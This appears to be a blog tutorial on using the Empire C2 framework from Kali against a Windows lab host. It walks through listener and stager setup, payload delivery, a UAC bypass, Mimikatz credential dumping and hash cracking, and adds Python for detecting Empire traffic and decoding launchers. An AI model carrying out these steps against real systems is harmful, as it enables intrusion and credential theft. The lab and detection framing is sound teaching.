Empire -- PowerShell Post-Exploitation Agent

In today's article we discuss the Empire framework as maintained by BC Security. Kali Linux and BC Security have partnered, and Kali users got early access to Empire 3 (the powershell-empire package) and Starkiller, its GUI front end. This is what the Kali developers said:

BC Security is the team who is currently maintaining the most active fork of Empire. In August 2019, the original maintainers archived the project, but with Open-source projects (as long as they don’t break software licenses) other groups can take someone else’s code and improve upon it. This is exactly what BC Security did, forking the project, to keep the flame of PowerShell Empire alive.

In this detailed tutorial we will install Empire 3 on our Kali Linux system and use it for post-exploitation against a Windows target in our lab.

Introduction

Empire is a post-exploitation framework whose agents support several operating systems. The Windows agent is implemented purely in PowerShell (without powershell.exe!), and the Linux/macOS agent in Python 3. Feature-rich, with many options to bypass various protections (and easily modified for custom evasion), Empire is often a favourite for Command and Control (C2) activity.

Empire's server is written in Python 3, its agents talk to it over cryptographically secure channels, and the whole thing is built on a flexible listener, stager and module architecture. Empire can run PowerShell agents without needing powershell.exe, and it ships with a large set of post-exploitation modules ranging from keyloggers to Mimikatz. Empire 3 merges the earlier PowerShell Empire and Python Empire (EmPyre) projects, and BC Security keeps improving it and making it more convenient to use. Now let's use Empire on Kali Linux.

PowerShell gives an attacker a lot: full access to .NET, ways around application whitelisting such as AppLocker, and direct access to the Win32 API. It can load malicious code in memory instead of dropping binaries to disk, provides C2 functionality with staged delivery (a small first stage that fetches the full second stage), and is useful for lateral movement. Empire is also developed quickly compared with other frameworks. Because the agent does not need powershell.exe, it sidesteps controls that only watch for that process; this does not make it invisible to antivirus or EDR, which can still observe the PowerShell engine being loaded (for example through AMSI and script block logging), so treat "bypasses AV" as "bypasses some AV". For these reasons Empire is a good choice.


Install Empire on Kali Linux

Installing Empire on Kali Linux is now very easy, because it is in the official Kali repository. We just need to run the following command in a terminal:

sudo apt install powershell-empire -y

The above command prompts for the sudo password, then downloads and installs Empire, as we can see in the following screenshot:

[Screenshot: installing Empire]
After the process is complete we can use Empire.

Using Empire on Kali Linux

After installing Empire we start the framework with the following command:

sudo powershell-empire

(The steps below follow Empire 3. In later Kali packages the framework is split into a server and a client, started with sudo powershell-empire server and, in a second terminal, sudo powershell-empire client; the listener, stager and agent workflow described below is then typed into the client.)

Then the main screen of Empire appears, as in the following screenshot:

[Screenshot: powershell-empire main screen]

Here we can see that the Empire framework is running. Use the help command to see all the options of the framework:

help

It shows the help for this framework, as we can see in the following screenshot:

[Screenshot: powershell-empire help menu on Kali Linux]
First of all we need to create a listener on our local machine. Type the following command:

listeners

After running the above command, it will say that “[!] No listeners currently active”.

[Screenshot: empire listeners]

Don't worry: we have no active listeners yet, but we are now in the listeners interface. In the listeners interface we type the following command:

uselistener <TAB> <TAB>

Here we type uselistener, then a space, then press the TAB key twice (double TAB). This lists all the listeners we can use, such as dbx, http, http_com, redirector, meterpreter, etc.

[Screenshot: uselistener list]

The most popular and commonly used listener is http, and we will use it in this guide. To use it we type the following command:

uselistener http

This selects an HTTP listener whose default port is 80. If port 80 is already in use (for example by Apache), either stop that service or change the port with set Port <port>, e.g. set Port 8080. The listener is not tied to port 80; whatever port we choose is the one the stager will call back to, so it must be reachable from the target.

[Screenshot: starting http listener]
Now we use the info command, which shows the options of the listener type we selected, as seen below.

[Screenshot: http listener information]

Here we can see the information about our listener. As the screenshot shows, there are a variety of settings we can use to customise it. Let's change the name of our listener, which helps to keep track of them when several are active. For this we type the following command:

set Name test

This command will change the 'Name' of the listener to test from http.

Listeners automatically fill in Host with the local IP (shown as a URL such as http://<IP>:<port>), but if we need to change it we can do so with the following command:

set Host 192.168.225.54

If we wish we can check all the information again with the info command. The Host value must be the address the target can actually reach; on a NAT'd or cloud box that is the public address or the redirector in front of it, not the interface IP Empire picked. If everything is alright we start the listener with the following command:

execute

In the following screenshot we can see that our listener has been started.

[Screenshot: Empire listener has been started]

Then we go back from the listener interface so that we can use stagers and modules, with the following command:

back
[Screenshot: back from the listener]
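The info output for the http listener also shows a DefaultProfile option: the request URIs and User-Agent the agent will use when it talks to the listener. Its stock value, /admin/get.php,/news.php,/login/process.php|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, is widely fingerprinted, so on a real engagement you would change it with set DefaultProfile <profile> before execute. The Python below is an added example, not Empire's own code: it parses Empire's uris|user-agent|Header:Value profile syntax and runs the stock profile and a made-up custom one over a few constructed proxy-style log lines, to show which requests a defender matches when they know the profile. The log format, addresses and the custom profile's paths are invented for the example.

```python
import re
from dataclasses import dataclass

# Stock value of the http listener's DefaultProfile option in Empire 3.
EMPIRE_DEFAULT_PROFILE = (
    "/admin/get.php,/news.php,/login/process.php|"
    "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
)

# A customised profile an operator might set instead (invented value for this example):
#   set DefaultProfile /api/v2/status,/static/app.js|<UA>|Accept:*/*
CUSTOM_PROFILE = (
    "/api/v2/status,/static/app.js|"
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) "
    "Chrome/120.0.0.0 Safari/537.36|Accept:*/*"
)


@dataclass
class CommProfile:
    uris: list
    user_agent: str
    headers: dict


def parse_profile(profile: str) -> CommProfile:
    """Parse Empire's 'uri1,uri2|User-Agent|Header:Value|...' profile syntax."""
    parts = profile.split("|")
    if len(parts) < 2:
        raise ValueError("profile needs at least 'uris|user-agent'")
    uris = [u.strip() for u in parts[0].split(",") if u.strip()]
    headers = {}
    for h in parts[2:]:
        name, _, value = h.partition(":")
        headers[name.strip()] = value.strip()
    return CommProfile(uris=uris, user_agent=parts[1].strip(), headers=headers)


# Constructed proxy-style log lines: client method host path "user-agent".
SAMPLE_LOG = """\
10.0.0.21 GET 192.168.225.54 /admin/get.php "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
10.0.0.21 POST 192.168.225.54 /news.php "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
10.0.0.22 GET www.example.com /news.php "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
10.0.0.23 GET 192.168.225.54 /api/v2/status "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
10.0.0.24 GET intranet.example.com /login/process.php "curl/8.5.0"
"""

LOG_RE = re.compile(r'^(\S+) (\S+) (\S+) (\S+) "([^"]*)"$')


def find_profile_hits(log_text: str, profile: str):
    """Return (line_no, client, path) for requests matching BOTH a profile URI and its User-Agent.

    Requiring both cuts false positives: a stray /news.php fetched with a normal
    browser UA (line 3) or by curl (line 5) is not reported as a hit."""
    p = parse_profile(profile)
    hits = []
    for n, line in enumerate(log_text.splitlines(), 1):
        m = LOG_RE.match(line)
        if not m:
            continue
        client, _method, _host, path, ua = m.groups()
        if path in p.uris and ua == p.user_agent:
            hits.append((n, client, path))
    return hits


if __name__ == "__main__":
    # The stock profile lights up immediately; the custom one is only caught if
    # the defender has learned it, which is the point of changing it.
    for label, prof in (("stock", EMPIRE_DEFAULT_PROFILE), ("custom", CUSTOM_PROFILE)):
        print(label, find_profile_hits(SAMPLE_LOG, prof))
```

Changing the profile does not make the traffic benign, it only removes the free indicator; beaconing intervals, the staging request and TLS details (when using https) are still visible to a defender who looks.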

Now we can use stagers on Empire.

Using Stagers on PowerShell Empire

Stagers in Empire set the stage for post-exploitation. They are similar to payloads in other frameworks: a stager is the small piece of code that runs on the target and connects back to an Empire listener to fetch the full agent. Stagers are selected with the usestager command. We run the following command to see all the available stagers:

usestager <tab> <tab>

After the double TAB we can see all the stagers in the following screenshot:

[Screenshot: usestager modules]

In the above screenshot we can see that there are many stagers for Windows and OSX (macOS), plus some multi stagers for cross-platform use, which work on any platform Empire has an agent for.

As an example we assume that the target is a Windows PC and we use launcher_bat to deliver our agent. We use the following command:

usestager windows/launcher_bat

This selects the launcher_bat stager. We point it at our listener with the following command:

set Listener test

Now we just need the execute command to generate the stager.

execute

The above commands generate the stager for the listener named test and write it to /tmp/launcher.bat. Now we need to get this .bat file onto the victim's Windows system somehow (social engineering is the usual route). Here we are on our local network and we copy the file to our own Windows PC using Python's built-in HTTP server (python3 -m http.server, run from /tmp).

After copying and running the .bat file on the target Windows PC we get a session on our listener, as we can see in the following screenshot:

[Screenshot: Empire listener connected]
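To see what the .bat actually does on the target, it helps to take it apart. Empire's Windows launchers run powershell with no profile, a hidden window and an encoded command, where the encoded argument is base64 of the stage script as UTF-16LE (not UTF-8); that is why a decoded Empire stage starts with the IF($PSVersionTable... version check and the encoded form with SQBGACgAJABQAFMAVgBl. The Python below is an added example, not Empire's stager code: it builds a launcher in that shape around a harmless constructed stand-in script, recovers and decodes the -enc argument the way an analyst triaging the file would, and lists the static indicators that make the stock launcher easy to flag. The exact lines of a real launcher.bat vary by Empire version.

```python
import base64
import re

# Constructed stand-in for the PowerShell stage the .bat launches. A real Empire stage0
# also begins with a PSVersion check, which is why its encoded form starts with
# "SQBGACgAJABQAFMAVgBl"; the rest of this script is a harmless placeholder.
SAMPLE_STAGE0 = (
    'IF($PSVersionTable.PSVersion.Major -ge 3){$x=1};'
    'Write-Output "constructed stand-in, not a real stage"'
)


def encode_powershell_command(script: str) -> str:
    """PowerShell's -EncodedCommand takes base64 of the script as UTF-16LE, not UTF-8."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_powershell_command(b64: str) -> str:
    return base64.b64decode(b64).decode("utf-16-le")


def build_launcher_bat(script: str) -> str:
    """Assemble a launcher in the shape of Empire's windows/launcher_bat output
    (constructed for this example; the real stager's exact lines differ by version)."""
    enc = encode_powershell_command(script)
    return "\r\n".join([
        "@echo off",
        f"start /b powershell -noP -sta -w 1 -enc {enc}",   # -noP: no profile, -w 1: hidden window
        'start /b "" cmd /c del "%~f0"&exit /b',            # delete the .bat itself after launch
    ]) + "\r\n"


# Matches every spelling PowerShell accepts for the encoded-command switch.
ENC_ARG_RE = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def decode_launcher(bat_text: str) -> list:
    """Recover and decode every -enc payload from a launcher, as an analyst would when triaging it."""
    return [decode_powershell_command(m) for m in ENC_ARG_RE.findall(bat_text)]


def launcher_indicators(bat_text: str) -> dict:
    """Cheap static indicators that make the stock launcher easy to flag."""
    lowered = bat_text.lower()
    return {
        "encoded_command": bool(ENC_ARG_RE.search(bat_text)),
        "hidden_window": "-w 1" in lowered or "-w hidden" in lowered or "-windowstyle hidden" in lowered,
        "no_profile": "-nop" in lowered,
        "self_delete": "%~f0" in bat_text,
        "stage_is_empire_shaped": any(s.startswith("IF($PSVersionTable") for s in decode_launcher(bat_text)),
    }


if __name__ == "__main__":
    bat = build_launcher_bat(SAMPLE_STAGE0)
    print(bat)
    print(decode_launcher(bat))
    print(launcher_indicators(bat))
```

Every one of those indicators (encoded command, hidden window, no profile, self-deleting batch file) is something script block logging, Sysmon process creation events or an EDR rule will key on, which is the practical reason operators obfuscate or rewrite the stock launcher before use.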

Agents of Empire

When we send the stager to the target system and the machine executes it, we get a connection back. Empire calls this an agent.

We can see our agents by simply using agents command:

agents

We can see our active agents in the following screenshot.

[Screenshot: active agents on Empire]

Now we are in the agents menu and we can check the agents help with the help command.

[Screenshot: active agents help options]

If the generated agent name is hard to remember we can rename it with the following command:

rename AgentName NewName

We have changed our agent's name as shown in the following screenshot:

[Screenshot: agent name changed]

Now we can interact with our agent (we renamed it Agent1 for this example) with the following command:

interact Agent1

After running the command we can interact with our agent, as seen in the following screenshot:

[Screenshot: interact with agent]

Here too we can press double TAB (TAB TAB) to view all the commands available in the agent shell. There are many commands useful for post-exploitation, such as info, jobs and shell, as shown in the following screenshot:

[Screenshot: agent commands in powershell-empire]

As an example we run the info command to get information about our target, as shown in the following screenshot:

[Screenshot: information on a powershell-empire agent on Kali Linux]

At this point we have a session, but it runs in the user's normal (medium-integrity) context. To get an elevated session we run bypassuac <listenerName>, which spawns a new agent through a UAC bypass. Note the precondition: this only works when the logged-in user is already a member of the local Administrators group and UAC is filtering their token; for a standard user it does nothing, and a real privilege-escalation module is needed instead:

bypassuac test

The above command adds another agent, as we can see in the following screenshot:

[Screenshot: bypassuac test on powershell-empire]

We can hit Enter after the stage-2 agent has been sent to get our console back. Now we can list our agents again with the agents command; we also renamed the new agent Agent2, as shown in the following screenshot:

[Screenshot: new powershell-empire agent renamed]

Our new agent (Agent2) has administrative privileges, and we can interact with it using the interact <agentname> command:

interact Agent2

[Screenshot: interact with the new powershell-empire agent]

Here too we can press TAB TAB (double TAB) to see all the commands we can run. We can also run Mimikatz from here to obtain the credentials of users logged on to the Windows system. Mimikatz will not work from a non-elevated shell: reading LSASS memory requires an elevated (administrative) context, so the fact that it runs here confirms that we have admin access.

To run mimikatz we just use following command:

mimikatz

Mimikatz runs if our agent has admin privileges, as we can see in the following screenshot:

[Screenshot: powershell-empire runs Mimikatz]

In the above screenshot we can see that Mimikatz worked and we got the user's NT hash (labelled NTLM in the output). If we are lucky we may also get the plaintext Windows login password here; otherwise we can crack the NT hash. It is an unsalted MD4 hash, so rainbow tables and online lookup services work against it, though an offline tool such as hashcat (mode 1000) or John the Ripper is the safer choice because it does not hand the hash to a third party. Note also that the hash alone is enough to authenticate over NTLM (pass-the-hash), so cracking is often unnecessary for the attacker, and changing the password is the only real fix for the defender.

[Screenshot: cracking the NT hash online]
Cracked the NT hash online using CrackStation

Modules on Empire

We can also run various modules using Empire. Modules are selected with the usemodule command. Type usemodule, a space, then TAB twice to list all the modules:

[Screenshot: module list on powershell-empire]

We can use these modules to perform activities on the target system: create persistence backdoors on the compromised system, run keyloggers, or even prank the user by showing some text or changing the wallpaper.

We will learn more about the different modules in a later tutorial. First, let's take a look at how to use a module in Empire, using "external/generate_agent" as an example. We type the following command:

usemodule external/generate_agent

The above command loads the module. Once it is loaded, type the help command to see all the commands we can use with the module.

Then we need to set our Listener by using set Listener <listenerName> command:

set Listener test

Then we need to set the language for the module to run by using following command:

set Language powershell

Then we just need to run the execute command. Simple.

This is how we can use the Empire framework on our Kali Linux system. As we learned in this article, Empire can do almost anything on the compromised system; the agents and modules open many new avenues for an attacker. Previously this was known as PowerShell Empire (archived); now it is maintained by BC Security and is simply called Empire, so we can say "Empire Strikes Back". The tool is still under active development, so some errors may be encountered.

Disclaimer:-  All the information provided on this article are for educational purposes only. The site is no way responsible for any misuse of the information. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. We believe that it is impossible to defend yourself from hackers without knowing how hacking is done.


Author: Kali Linux
